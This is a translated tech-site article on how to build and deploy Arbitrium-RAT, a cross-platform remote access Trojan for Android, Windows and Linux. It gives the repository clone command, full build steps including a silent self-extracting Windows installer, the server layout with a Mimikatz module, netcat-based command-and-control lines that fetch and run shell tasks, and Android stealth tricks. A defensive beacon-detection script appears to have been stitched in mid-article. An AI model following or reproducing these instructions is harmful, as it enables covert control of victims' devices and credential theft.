
How to use Arbitrium-RAT to plant remote access Trojans to Android, Windows and Linux

2025-03-30 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/03 Report--

This article introduces how Arbitrium-RAT is used to plant remote access Trojans on Android, Windows and Linux. It is fairly detailed and has some reference value; interested readers should read it to the end.

About Arbitrium

Arbitrium is a cross-platform remote access Trojan, described by its author as fully undetectable, that lets researchers control Android, Windows and Linux systems without configuring any additional firewall or port-forwarding rules. It also gives access to the target's local network: the compromised device can be used as an HTTP proxy to reach the router on the target network, discover local IP addresses, scan ports, and so on.

Arbitrium also ships with Mimikatz-like modules and lets researchers add custom modules. Combined with DNS-spoofing software, it can propagate the backdoor automatically between devices on the target network. Arbitrium is a multi-part project written in several languages: Java, JS, C, Python, Cordova and VueJS.

Features

Fully undetectable (FUD)

The client uses simple tooling, which is what lets Arbitrium stay undetected. The Trojan's communication is based on netcat; this component is mainly responsible for piping TCP data and running the commands sent by the server.

Firewalls

Arbitrium does not require any firewall exclusion or port-forwarding rules. The server is an API endpoint that receives tasks destined for target hosts and other devices, and the Trojan periodically asks the server for new control instructions. A control instruction is either a JavaScript file (the Android application is built with Cordova) or a shell script that can be run from the command-line terminal. When the server receives a task for a target device, it schedules the task, then opens a child process that listens on a dedicated temporary port and waits for the backdoor to respond. The Trojan itself therefore never needs to listen on any port.
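From the defender's side, the polling design described above leaves a recognisable trace: the same client fetching the same small resource on a fixed timer, because a scheduled "check for new tasks" request has far less jitter than human browsing. The following added example is not part of the article or the Arbitrium project; it runs a simple beacon check over constructed proxy log lines. The log format, the hostnames, the polled path and the thresholds are all assumptions chosen for illustration.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample proxy log lines (not from the page): one host polls
# /checkupdate.js roughly every 60 seconds, mixed with ordinary browsing.
SAMPLE_LOG = """\
2024-05-01T10:00:00Z 10.0.0.5 GET http://c2.example.invalid/checkupdate.js 200
2024-05-01T10:00:07Z 10.0.0.7 GET http://news.example.invalid/index.html 200
2024-05-01T10:01:00Z 10.0.0.5 GET http://c2.example.invalid/checkupdate.js 200
2024-05-01T10:01:31Z 10.0.0.7 GET http://news.example.invalid/sports.html 200
2024-05-01T10:02:01Z 10.0.0.5 GET http://c2.example.invalid/checkupdate.js 200
2024-05-01T10:02:59Z 10.0.0.5 GET http://c2.example.invalid/checkupdate.js 200
2024-05-01T10:03:44Z 10.0.0.7 GET http://news.example.invalid/index.html 200
2024-05-01T10:04:00Z 10.0.0.5 GET http://c2.example.invalid/checkupdate.js 200
2024-05-01T10:05:00Z 10.0.0.5 GET http://c2.example.invalid/checkupdate.js 200
2024-05-01T10:09:12Z 10.0.0.7 GET http://news.example.invalid/index.html 200
"""

# Assumed log layout: "<iso-timestamp> <client-ip> <method> <url> <status>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$"
)


def parse_line(line):
    """Parse one log line into (timestamp, client, host, path); None if malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
    url = m["url"]
    host_path = url.split("://", 1)[1] if "://" in url else url
    host, _, path = host_path.partition("/")
    return ts, m["src"], host, "/" + path


def detect_beacons(log_text, min_hits=5, max_cv=0.15):
    """Flag (client, host, path) triples whose inter-request gaps look timer-driven.

    A series counts as a beacon when it has at least `min_hits` requests and the
    coefficient of variation (stdev / mean) of the gaps is at most `max_cv`.
    """
    times = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ts, src, host, path = rec
        times[(src, host, path)].append(ts)

    findings = []
    for (src, host, path), stamps in times.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.fmean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            findings.append({
                "src": src, "host": host, "path": path, "hits": len(stamps),
                "mean_interval_s": round(mean, 1), "cv": round(cv, 3),
            })
    return findings


if __name__ == "__main__":
    for f in detect_beacons(SAMPLE_LOG):
        print(f)
```

On the constructed sample, only 10.0.0.5 is reported: six requests to /checkupdate.js with a mean gap of 60 s and a coefficient of variation under 0.02, while the browsing host falls below the hit threshold. In practice the thresholds need tuning per environment, and legitimate software updaters also poll on timers, so this is a triage signal to combine with destination reputation, not a verdict on its own.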

Battery optimization / concealment mode

Unlike stock Android, customised builds such as Xiaomi's MIUI, Huawei's EMUI or Samsung's Android Pie ignore the permissions and battery-optimisation exceptions the user grants to an application. If the Android backdoor tries to run in the background, it is killed as soon as it performs frequent or heavy (sometimes even lightweight) work such as periodic HTTP requests, regardless of the permissions the user granted; the operating system simply ignores the configuration.

This is very annoying, but after some research I found that the assigned tasks can keep running in the background if they are moved into a lightweight native binary, while MainActivity does nothing further after launching it. This circumvents most of the restrictions and improves the application's performance.

MainActivity receives a JS file from the server and starts the binary through a ThreadPoolExecutor without waiting for it to exit (more details under StealthMode/BatteryBypass).

Web interface

The tool also provides a control panel; the web interface is optional, not required. It is a simple VueJS web application, a UI for controlling targets instead of sending command requests to the API by hand. See the Arbitrium WebApp.

Requirements

Android client:
  Java ver...
  Cordova
  Android SDK & NDK

Windows/Linux client:
  Python3.6 (or later)
  PyInquirer
  Winrar (Windows only)

Project build

Note: use setAPI_FQDN.sh to set the server domain name / IP address in all files.

Clone the project source code locally using the following command:

$ git clone --recursive https://github.com/BenChaliah/Arbitrium-RAT.git

Android

$ cd ArbitriumClients/AndroidApp/ClientApp/
$ cordova build android
$ cd ../StealthMode/
$ make clean && make build

Windows

$ cd ArbitriumClients\WindowsApp
$ pyinstaller --onefile runFrame.py
$ copy Client_tools\toolbox.exe dist\
$ copy Client_tools\SFXAutoInstaller.conf dist\
$ copy Client_tools\start_script.vbs dist\
$ cd dist
$ {Rar_abspath} a -r -cfg -sfx -z "SFXAutoInstaller.conf" Standalone.exe

Component: Server API

$ pip install flask flask_cors && ./runserver.sh   # Python2.7

├── runserver.sh
├── main.py
├── reverse_http.py
├── initProxy.py
├── assets (src: ArbitriumClients/AndroidApp/StealthMode)
│   ├── runFrame_arm64-v8a
│   ├── toolbox_arm64-v8a
│   └── ... (x86, x86_64, armeabi-v7a)
├── JS_scripts
│   ├── checkupdate.js
│   ├── init.js
│   ├── runshell.js
│   └── StealthMode.js
├── misc
└── modules
    ├── discover.py
    ├── mimikatz.py
    ├── ports.py
    └── runCMD.py

Threads

Endpoints

[GET] /checkupdate.js

Example: suppose you want to use the target as an HTTP proxy; the API builds the request as the following command:

echo -e "GET / HTTP/1.1\r\nHost: 192.168.1.1\r\nConnection: close\r\n\n" | {abspath_toolbox/ncat} {API_HOST_IP} {lport} -w 10;\r\n

It then stores the command in assets/runsh_{uid_task}.sh, and /checkupdate.js makes the Trojan download and execute that shell file:

Popen("exec $(nc -l 0.0.0.0 -p {lport} -dN > {task_filename})", shell=True, close_fds=True, ...)

Screenshots of the tool running: HTTP proxy, PowerShell, port scan.

That concludes the article "How to use Arbitrium-RAT to implant remote access Trojans to Android, Windows and Linux". Thank you for reading! We hope the content is helpful; for more related knowledge, follow the industry information channel.
